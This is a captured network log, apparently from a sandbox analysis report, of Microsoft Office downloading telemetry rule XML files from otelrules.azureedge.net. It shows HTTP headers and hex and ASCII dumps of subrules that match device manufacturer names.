2024-10-30 02:46:38 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
31192.168.2.44978613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 420
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DAE3EC0"
x-ms-request-id: ce95f5ab-001e-0034-242a-27dd04000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-17c5cb586f69w69mgazyf263an00000006p0000000006erp
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


Session IDSource IPSource PortDestination IPDestination Port
32192.168.2.44978713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D43097E"
x-ms-request-id: 25321125-401e-0047-18d5-288597000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-r197bdfb6b4xfp4mncra29rqkc00000000v000000000b2z4
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
33192.168.2.44978813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
ETag: "0x8DC582BA909FA21"
x-ms-request-id: c9fe3c14-601e-0050-50d7-262c9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-16849878b78qwx7pmw9x5fub1c00000005k000000000d9vy
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
34192.168.2.44978913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
ETag: "0x8DC582B92FCB436"
x-ms-request-id: baee9024-801e-00ac-4757-29fd65000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-17c5cb586f626sn8grcgm1gf8000000005z0000000004h3m
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
35192.168.2.44979013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:39 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:39 GMT
Content-Type: text/xml
Content-Length: 423
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
ETag: "0x8DC582BB7564CE8"
x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024639Z-16849878b78hh85qc40uyr8sc800000007qg00000000bv9f
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


Session IDSource IPSource PortDestination IPDestination Port
36192.168.2.44979113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:39 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:39 GMT
Content-Type: text/xml
Content-Length: 478
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
ETag: "0x8DC582B9B233827"
x-ms-request-id: 6856914c-401e-0029-0667-279b43000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024639Z-16849878b78j5kdg3dndgqw0vg000000094000000000d65x
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
37192.168.2.44979413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:39 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:39 GMT
Content-Type: text/xml
Content-Length: 400
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
ETag: "0x8DC582BB2D62837"
x-ms-request-id: b906435d-801e-008c-78a0-297130000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024639Z-17c5cb586f67hfgj2durhqcxk8000000067000000000fcvv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


Session IDSource IPSource PortDestination IPDestination Port
38192.168.2.44979313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:39 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:39 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
ETag: "0x8DC582BB046B576"
x-ms-request-id: 0ce3105a-501e-0029-7cd2-26d0b8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024639Z-16849878b785jrf8dn0d2rczaw00000008hg00000000grez
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
39192.168.2.44979213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:39 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:39 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:39 GMT
Content-Type: text/xml
Content-Length: 404
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
ETag: "0x8DC582B95C61A3C"
x-ms-request-id: a783173c-501e-008c-2349-27cd39000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024639Z-16849878b78bcpfn2qf7sm6hsn00000008z000000000mdf8
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:39 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session IDSource IPSource PortDestination IPDestination Port
40192.168.2.44979513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:39 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:39 GMT
Content-Type: text/xml
Content-Length: 479
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
ETag: "0x8DC582BB7D702D0"
x-ms-request-id: b2eb4648-201e-0051-526d-287340000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024639Z-r197bdfb6b4grkz4xgvkar0zcs000000071000000000e17z
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:40 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
41192.168.2.44979613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:40 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:40 GMT
Content-Type: text/xml
Content-Length: 425
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
ETag: "0x8DC582BBA25094F"
x-ms-request-id: 395ac5b3-901e-0083-7e6a-27bb55000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024640Z-r197bdfb6b4b4pw6nr8czsrctg000000088000000000556y
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:40 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


Session IDSource IPSource PortDestination IPDestination Port
42192.168.2.44979713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:40 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:40 GMT
Content-Type: text/xml
Content-Length: 475
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
ETag: "0x8DC582BB2BE84FD"
x-ms-request-id: 99f07890-301e-0051-29d2-2538bb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024640Z-16849878b78hh85qc40uyr8sc800000007q000000000eb0f
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
